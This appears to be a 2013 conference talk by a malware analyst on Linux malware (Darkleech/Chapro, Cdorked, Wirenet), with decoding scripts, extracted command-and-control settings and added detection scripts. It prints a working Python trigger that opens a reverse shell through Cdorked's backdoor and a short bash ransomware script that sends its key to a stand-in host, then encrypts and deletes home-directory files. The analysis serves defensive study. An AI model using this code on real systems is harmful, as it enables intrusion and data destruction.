malwaremoutane.net/rmll2013/day_1/linux_malware.pdf
Linux malware presentation
@r00tbsd – Paul Rascagnères from Malware.lu
Malware.lu
July 2013
Plan
- Presentation
- Darkleech/Chapro
- Cdorked
- Wirenet
- Conclusion
Presentation
Who am I? Paul Rascagnères - @r00tbsd or @malware.lu.
- Creator and maintainer of malware.lu
- Malware analysis, incident response, reverse engineering...
- Author of “Malware – Identification, analyse et éradication”
Why am I here and why this talk? Some people think that malware doesn't exist on the Linux platform.
4 examples in 2012/2013:
- Darkleech (Apache module)
- Cdorked (Apache server)
- Wirenet (Remote Administration Tool)
- gift...
Darkleech/Chapro
First seen: the first version was identified in August 2012.
How does it work? This malware is an Apache module. The module is loaded by the LoadModule directive defined in the module configuration file.
Features:
- inject JavaScript code to redirect users to an infected website
- backdoor
Analysis - module
Module file name: mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so
Example: mod_sec2_config.so
Module execution:
cat /etc/apache2/modules/[VARIOUS].conf
LoadModule sec2_config_module modules/mod_sec2_config.so
Analysis - Symptoms
The malware injects Exploit Kits (JS) on the Web pages:
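As an added defender-side check (not code from the talk), the script below audits LoadModule lines against the module naming pattern above. The pattern alone also matches legitimate modules such as mod_authz_host.so, so each hit is cross-checked against a hypothetical allow-list of module names expected on the host; the sample configuration is constructed.

```python
import re

# Module file-name pattern given in the talk for Darkleech/Chapro:
#   mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so   e.g. mod_sec2_config.so
DARKLEECH_NAME = re.compile(r'^mod_[a-z0-9]{3,}_[a-z0-9]{3,}\.so$')
LOADMODULE_RE = re.compile(r'^\s*LoadModule\s+(\S+)\s+(\S+)', re.IGNORECASE)

# Hypothetical allow-list: on a real host build it from a known-clean install
# (e.g. the module names shipped by the distro packages), not from the live box.
KNOWN_MODULES = {'rewrite_module', 'authz_host_module', 'ssl_module'}


def audit_loadmodules(config_text, known=KNOWN_MODULES):
    """Return {module_name: (path, [reasons])} for LoadModule lines worth a look.

    The name pattern alone also matches legitimate modules (mod_authz_host.so),
    so every hit is cross-checked against the allow-list; a module that matches
    the pattern AND is unknown is the Darkleech-like case.
    """
    findings = {}
    for line in config_text.splitlines():
        m = LOADMODULE_RE.match(line)
        if not m:
            continue
        module, path = m.groups()
        filename = path.rsplit('/', 1)[-1]
        reasons = []
        if DARKLEECH_NAME.match(filename):
            reasons.append('filename matches Darkleech naming pattern')
        if module not in known:
            reasons.append('module not in allow-list')
        if reasons:
            findings[module] = (path, reasons)
    return findings


# Constructed sample configuration, mirroring the LoadModule line shown in the talk.
SAMPLE_CONFIG = """\
LoadModule rewrite_module modules/mod_rewrite.so
LoadModule authz_host_module modules/mod_authz_host.so
LoadModule sec2_config_module modules/mod_sec2_config.so
"""

if __name__ == '__main__':
    for module, (path, reasons) in sorted(audit_loadmodules(SAMPLE_CONFIG).items()):
        print('%s (%s): %s' % (module, path, '; '.join(reasons)))
```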
Analysis – Symptoms
The redirection is performed by a JavaScript insertion (IFrame):
Analysis – Targets selection
The target selection is performed using the REFERER.
C_ARRAY_BAN_USERAGENT: SAFARI, YANDEX, OPERA, CRAWLER, FIREFOX, JIKE, CHROME, SPIDER, GOOGLEBOT, ROBOT, SLURP, PAPERLIBOT, YAHOO, SNAPPREVIEWBOT, BING, BUFFERBOT, LINUX, MEDIAPARTNERS, OPENBSD, HATENA, MACINTOSH, BLUEDRAGON, MAC OS, WORDPRESS, IPHONE, XIANGUO...
Analysis – Reversing
The data are encoded in the file:
Analysis – Reversing
Several functions (symbols) are linked to the encoding:
- 0x17C8 xor_decrypt_string
- 0x17ED xor_encrypt_string
- 0x1800 xor_encrypt
Analysis – Reversing
xor_decrypt_string pseudo-C:
xor_decrypt_string(A8, Ac, A10, A14)
{
    L00003117();
    ebx = ebx + 0x5001;
    esp = esp - 0xc;
    Vfffffff4 = A14 + 1;
    *esp = *(*(*(*(ebx + -300)) + 0xc));
    *(ebp - 0x10) = L00002D90();
    if (A14 > 0) {
        ecx = 0;
        do {
            edx = 0;
            eax = 0;
            edx = 0 >> 0x1f;
            Ac = Ac / Ac;
            al = *A10 & 0xff ^ *(Ac % Ac + A8);
            *(*(ebp - 0x10)) = al;
        } while (1 != A14);
    }
    esi = *(ebp - 0x10);
    *(esi + A14) = 0;
    eax = esi;
    esp = esp + 0xc;
}
Analysis – Reversing
xor_decrypt_string python implementation:
import sys
from itertools import izip, cycle   # Python 2

fd = open(sys.argv[1], 'rb')
fd.seek(0x84a0)          # offset of the XOR key inside the module
key = fd.read(23)        # 23-byte key
# tab: list of {'name', 'offset', 'size'} entries for the encoded strings,
# recovered while reversing the module
for s in tab:
    fd.seek(s['offset'])
    data = fd.read(s['size'])
    # XOR each byte with the key, cycling over the key
    decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
    clear_text = decrypted.split('\x00')[0]   # strings are NUL-terminated
    print('%s: %s' % (s['name'], clear_text))
Analysis – Reversing
$ python sec2.py "./mod_sec2_config.so"
C_MODULE_VERSION: "2012.12.14"
C_CC_HOST: "217.23.13.6"
C_CC_URI: "/Home/index.php"
C_CC_REQUEST_FORMAT: "POST %s HTTP/1.1"Host: "%s"Content-Type: "application/x-www-form-urlencoded"Content-Length:" %i %s"
C_MARKER_LEFT: "{{{"
C_MARKER_RIGHT: "}}}"
C_TMP_DIR: "/"
C_LIST_PREF: "sess_"
C_COOKIE_NAME: "PHP_SESSION_ID="
C_ARRAY_TAGS_FOR_INJECT: " < /script> < /style> < /head> < /title>..."
Cdorked
Presentation
Unlike its brother Darkleech/Chapro, Cdorked is not an Apache module but a custom Apache server. The malware uses XOR to encrypt its strings:
from itertools import izip, cycle   # Python 2

fd = open(sys.argv[1], 'rb')   # the Cdorked httpd binary
fd.seek(0x16B460)              # offset of the XOR key
key = fd.read(24)              # 24-byte key
# tab: list of {'offset', 'size'} entries for the encoded strings,
# recovered while reversing the binary
for i, s in enumerate(tab):
    fd.seek(s['offset'])
    data = fd.read(s['size'])
    decrypted = ''.join(chr(ord(c) ^ ord(k)) for c, k in izip(data, cycle(key)))
    print('xx%s: %s' % (i, decrypted))
How to get a shell? - request
How to get a shell? - encryption
Here is the code:
ip = $client_ip
key[0] = ((ip AND 0xFF000000) >> 24) + 5
key[1] = ((ip AND 0xFF0000) >> 16) + 33
key[2] = ((ip AND 0xFF00) >> 8) + 55
key[3] = (ip) + 78
How to get a shell? - the reverse-shell
import urllib2
import subprocess
import os

LHOST = '192.168.56.1'
LPORT = '4444'
RHOST = '192.168.56.101'
RPORT = '80'

param = ('GET_BACK;%s;%s' % (LHOST, LPORT)).encode('hex')
request = 'http://%s:%s/favicon.iso?%s' % (RHOST, RPORT, param)

if os.fork():
    req = urllib2.Request(request)
    req.add_header('X-Real-IP', '251.223.201.178')
    urllib2.urlopen(req)
else:
    subprocess.call(['nc', '-l', LPORT])
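The request shape used above (/favicon.iso?<hex>) is also something a defender can search for. The following added example (not code from the talk) decodes such query strings out of constructed Apache access-log lines in combined format; it assumes the request is actually written to the access log, and since the PoC overrides the client address with an X-Real-IP header, the logged IP should not be taken as reliable attribution.

```python
import binascii
import re

# Apache "combined" access-log shape assumed for the constructed samples below.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d+)')
# Trigger shape from the talk's PoC: /favicon.iso?<hex-encoded command>
TRIGGER_RE = re.compile(r'^/favicon\.iso\?(?P<hex>[0-9a-fA-F]+)$')


def decode_cdorked_query(url):
    """Return the decoded command if `url` looks like a Cdorked trigger, else None."""
    m = TRIGGER_RE.match(url)
    if not m or len(m.group('hex')) % 2:
        return None
    raw = binascii.unhexlify(m.group('hex'))
    text = raw.decode('ascii', errors='replace')
    # A genuine trigger decodes to printable ASCII such as "GET_BACK;<host>;<port>";
    # arbitrary hex in a query string usually does not, so those are dropped.
    if not all(32 <= ord(ch) < 127 for ch in text):
        return None
    return text


def scan_access_log(lines):
    """Return a list of (logged client IP, decoded command) for suspicious requests."""
    hits = []
    for line in lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue
        cmd = decode_cdorked_query(m.group('url'))
        if cmd is not None:
            hits.append((m.group('ip'), cmd))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Jul/2013:10:00:01 +0200] "GET /favicon.ico HTTP/1.1" 200 318 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Jul/2013:10:00:02 +0200] "GET /favicon.iso?4745545f4241434b3b3139322e3136382e35362e313b34343434 HTTP/1.1" 200 0 "-" "Python-urllib/2.7"',
    '198.51.100.9 - - [10/Jul/2013:10:00:03 +0200] "GET /favicon.iso?deadbeef HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
]

if __name__ == '__main__':
    for ip, cmd in scan_access_log(SAMPLE_LOG):
        print('%s -> %s' % (ip, cmd))
```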
Wirenet
Strings obfuscation
The attacker uses the RC4 algorithm to encrypt the configuration:
import sys
from Crypto.Cipher import ARC4   # PyCrypto, Python 2

fp = open(sys.argv[1])
fp.seek(0xf4d8, 0)    # offset of the RC4 key
key = fp.read(16)     # 16-byte key
# crypted: list of {'name', 'adr', 'len'} entries for the encrypted settings,
# recovered while reversing the binary
for c in crypted:
    rc4 = ARC4.new(key)            # fresh RC4 key stream for every string
    fp.seek(c['adr'])
    data = fp.read(c['len'])
    val = rc4.decrypt(data).split('\x00')[0]   # NUL-terminated value
    print "%s: %s" % (c['name'], val)
    if c['name'] == 'BoolSettingsByte':
        # options: {option name: flag}; isOption() tests that flag in the byte
        for name, o in options.iteritems():
            print "%s: %s" % (name, isOption(val, o))
y0ug@laptop:~$ python decode.py 9a0e765eecc5433af3dc726206ecc56e
ConnectionString: 212.7.208.65:4141;
ProxyString: -
Password: sm0k4s523syst3m523
HostId: LINUX
MutexName: vJEewiWD
InstallPath: %home%/WIFIADAPT
StartupKeyName1: WIFIADAPTER
StartupKeyName2: -
KeyLoggerFileName: %Home%\.m8d.dat
BoolSettingsByte: 237
run_as_daemon: True
xinit_start: False
install_file: True
lock_file?: True
keylogger: True
single_instance: True
desktop_start: True
ConnectionType: 001
Fake C&C
wirenet $ New session 127.0.0.1:52956
wirenet $ session
0 127.0.0.1:52956 LINUX rootbsd @ alien
wirenet $ session 0
Switch to session 0 context
127.0.0.1:52956 $ help

Undocumented commands:
======================
EOF  cred_thunderbird  get   log_clear  mkdir  rm      shell
cp   creds             help  log_get    mv     screen
cred_pidgin  exit      info  ls         ps     session
127.0.0.1:52956 $ info
arch: LINUX
name: rootbsd @ alien
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.1 LTS"
127.0.0.1:52956 $ shell
Shell is start with /bin/sh (EOF to exit)
id
uid=1000(rootbsd) gid=1000(rootbsd) groups=1000(rootbsd),4(adm),20(dialout),24(cdrom),46(plugdev),116(lpadmin),118(admin),124(sambashare),1001(bumblebee)
Shell is stop
Gift
Linux is so powerful... (ransomware for free)
#!/bin/bash
passwd=$(openssl rand -hex 64)
curl http://www.c-and-c.com/test?$passwd
list=$(find $HOME -type f)
for i in $(echo $list)
do
    openssl aes-256-ecb -in $i -out $i.new -pass pass:$passwd
    rm $i
done
Conclusion